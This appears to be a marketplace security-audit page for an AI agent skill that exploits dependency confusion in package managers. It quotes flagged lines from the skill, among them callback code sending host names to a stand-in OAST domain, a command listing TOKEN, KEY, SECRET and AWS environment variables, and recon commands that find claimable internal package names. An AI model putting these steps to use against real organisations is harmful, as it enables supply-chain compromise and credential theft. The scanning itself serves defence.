exploiting-dependency-confusion
Identifies and exploits dependency confusion attacks in package managers, enhancing web application security assessments.
Install this skill
or
79/100
Security score
The exploiting-dependency-confusion skill was audited on Jun 14, 2026 and we found 9 security issues across 3 threat categories. Review the findings below before installing.
Categories Tested
Security Issues
medium line 118
Curl to non-GitHub URL
SourceSKILL.md
| 118 | curl -s https://target.example.com/static/main.js | grep -oE '"@[a-z0-9-]+/[a-z0-9-]+"' |
medium line 130
Curl to non-GitHub URL
SourceSKILL.md
| 130 | curl -s -o /dev/null -w "%{http_code}" https://pypi.org/pypi/company-internal/json # 404 -> claimable |
medium line 132
Curl to non-GitHub URL
SourceSKILL.md
| 132 | curl -s "https://api.nuget.org/v3-flatcontainer/company.internal/index.json" |
low line 164
Access to .env file
SourceSKILL.md
| 164 | node -e "console.log(Object.keys(process.env).filter(k=>/TOKEN|KEY|SECRET|AWS/.test(k)))" |
low line 82
External URL reference
SourceSKILL.md
| 82 | https.get('https://ENGAGEMENT.oast.fun/dc/' + id); |
low line 91
External URL reference
SourceSKILL.md
| 91 | urllib.request.urlopen("https://ENGAGEMENT.oast.fun/dc/" + os.uname().nodename) |
low line 118
External URL reference
SourceSKILL.md
| 118 | curl -s https://target.example.com/static/main.js | grep -oE '"@[a-z0-9-]+/[a-z0-9-]+"' |
low line 132
External URL reference
SourceSKILL.md
| 132 | curl -s "https://api.nuget.org/v3-flatcontainer/company.internal/index.json" |
low line 213
External URL reference
SourceSKILL.md
| 213 | 1. Recovered internal package name @acme/telemetry from https://target.example.com/static/main.js |
Scanned on Jun 14, 2026
View Security Dashboard